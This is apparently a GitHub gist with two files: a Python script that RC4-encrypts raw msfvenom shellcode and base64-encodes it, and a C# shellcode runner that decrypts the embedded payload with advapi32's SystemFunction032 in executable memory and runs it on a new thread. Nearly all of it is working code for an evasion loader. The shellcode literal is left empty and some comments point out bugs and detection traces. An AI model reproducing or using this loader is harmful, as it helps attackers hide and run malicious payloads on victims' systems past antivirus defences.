@snovvcrash
Last active December 29, 2022 20:11
#!/usr/bin/env python3
from typing import Iterator
from base64 import b64encode
# Stolen from: https://gist.github.com/hsauers5/491f9dde975f1eaa97103427eda50071
def key_scheduling(key: bytes) -> list[int]:
    """RC4 key-scheduling algorithm (KSA).

    Builds the 256-entry permutation table from ``key``; the key bytes are
    reused cyclically when the key is shorter than 256 bytes.

    Args:
        key: Cipher key. Must be non-empty -- an empty key makes the
            ``% len(key)`` below raise ``ZeroDivisionError``.

    Returns:
        The permuted state table (a list of 256 ints, a permutation of 0..255).
    """
    state = list(range(256))
    key_len = len(key)
    swap_idx = 0
    for pos in range(256):
        swap_idx = (swap_idx + state[pos] + key[pos % key_len]) % 256
        # Standard KSA swap of the current slot with the key-derived slot.
        state[pos], state[swap_idx] = state[swap_idx], state[pos]
    return state
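def stream_generation(sched: list[int]) -> Iterator[int]:
    """RC4 pseudo-random generation algorithm (PRGA).

    Yields one keystream byte per ``next()`` call, forever. The return
    annotation was corrected from ``Iterator[bytes]``: each yielded value is
    an ``int`` in 0..255, not a ``bytes`` object.

    Args:
        sched: The 256-entry state table from ``key_scheduling``. It is
            permuted in place as the stream advances, so a table must not be
            shared between two streams.

    Yields:
        The next keystream byte as an int.
    """
    i = j = 0
    while True:
        i = (i + 1) % 256
        j = (j + sched[i]) % 256
        # Standard PRGA swap; the output byte is read from the updated table.
        sched[i], sched[j] = sched[j], sched[i]
        yield sched[(sched[i] + sched[j]) % 256]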
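def encrypt(plaintext: bytes, key: bytes) -> bytes:
    """Encrypt (or decrypt) ``plaintext`` with RC4 under ``key``.

    RC4 is symmetric: applying this to the ciphertext with the same key
    returns the original bytes.

    Args:
        plaintext: Bytes to process; empty input yields ``b''``.
        key: Non-empty cipher key.

    Returns:
        ``plaintext`` XORed with the RC4 keystream, same length as the input.

    Raises:
        ValueError: If ``key`` is empty (previously surfaced as a
            ``ZeroDivisionError`` from ``key_scheduling``).
    """
    if not key:
        raise ValueError('key must not be empty')
    key_stream = stream_generation(key_scheduling(key))
    # Build the output in a single pass; the former
    # ``ciphertext += bytes([enc])`` recopied the growing buffer on every
    # byte, which is quadratic in the input length.
    return bytes(char ^ next(key_stream) for char in plaintext)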
if __name__ == '__main__':
    # msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
    # Reads the raw file, RC4-encrypts it under the fixed 16-byte key and
    # prints the result base64-encoded on stdout.
    with open('calc.bin', 'rb') as payload:
        encrypted = encrypt(payload.read(), b'aaaaaaaaaaaaaaaa')
    print(b64encode(encrypted).decode())
using System;
using System.Text;
using System.Runtime.InteropServices;
namespace RunShellcodeRC4
{
public class Program
{
    // Win32 entry points used below. Only VirtualAlloc has SetLastError
    // enabled; the results of CreateThread and WaitForSingleObject are not
    // checked anywhere in this class.
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll")]
    static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
    // advapi32 RC4 routine (exported only by ordinal name, hence EntryPoint).
    // Main relies on it transforming the data buffer in place -- its return
    // value is discarded and the same memory is executed afterwards.
    [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = false, EntryPoint = "SystemFunction032")]
    static extern int SystemFunction032(ref CRYPTO_BUFFER data, ref CRYPTO_BUFFER key);
    // Length-prefixed buffer descriptor passed (by ref) to SystemFunction032
    // for both the data and the key.
    [StructLayout(LayoutKind.Sequential)]
    struct CRYPTO_BUFFER
    {
        public uint Length;
        public uint MaximumLength;
        public IntPtr Buffer;
    }
    // Stolen from: https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/0e3dcfd55be8ac5fde1631d0f50753a761927082/MakeMeEnterpriseAdmin.ps1#L98-L125
    // Runs SystemFunction032 over `lengh` bytes at `input` using `key`.
    // The key is copied to an unmanaged HGlobal block for the call and freed
    // afterwards. NOTE(review): there is no try/finally, so the HGlobal leaks
    // if SystemFunction032 throws (e.g. a missing export). `lengh` is a typo
    // for `length`, kept as-is here.
    static int RtlEncryptDecryptRC4(IntPtr input, byte[] key, int lengh)
    {
        CRYPTO_BUFFER dataBuffer = new CRYPTO_BUFFER();
        dataBuffer.Length = dataBuffer.MaximumLength = (uint)lengh;
        dataBuffer.Buffer = input;
        CRYPTO_BUFFER keyBuffer = new CRYPTO_BUFFER();
        keyBuffer.Length = keyBuffer.MaximumLength = (uint)key.Length;
        keyBuffer.Buffer = Marshal.AllocHGlobal(key.Length);
        Marshal.Copy(key, 0, keyBuffer.Buffer, key.Length);
        int ret = SystemFunction032(ref dataBuffer, ref keyBuffer);
        Marshal.FreeHGlobal(keyBuffer.Buffer);
        return ret;
    }
    // Decrypts the embedded buffer in place and runs it on a new thread.
    // From a detection standpoint the observable sequence is: a private
    // RWX allocation, a write into it, then a thread started at that
    // non-image address.
    public static void Main()
    {
        // Same 16-byte key as the Python script above (RC4 is symmetric,
        // so the same routine decrypts what the script encrypted).
        var key = Encoding.UTF8.GetBytes("aaaaaaaaaaaaaaaa");
        // Placeholder: the base64 literal is empty in this gist; presumably
        // the Python script's output is meant to be pasted here.
        var buf = Convert.FromBase64String("");
        // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
        // NOTE(review): the size is hard-coded to 0x1000 regardless of
        // buf.Length, and the return value is never checked for IntPtr.Zero;
        // the Marshal.Copy below writes past the region if buf is larger.
        IntPtr alloc = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
        Marshal.Copy(buf, 0, alloc, buf.Length);
        // Return value deliberately discarded; success is assumed.
        _ = RtlEncryptDecryptRC4(alloc, key, buf.Length);
        // Thread handle is never closed; 0xFFFFFFFF is INFINITE, so Main
        // blocks until the thread exits.
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, IntPtr.Zero);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
}
}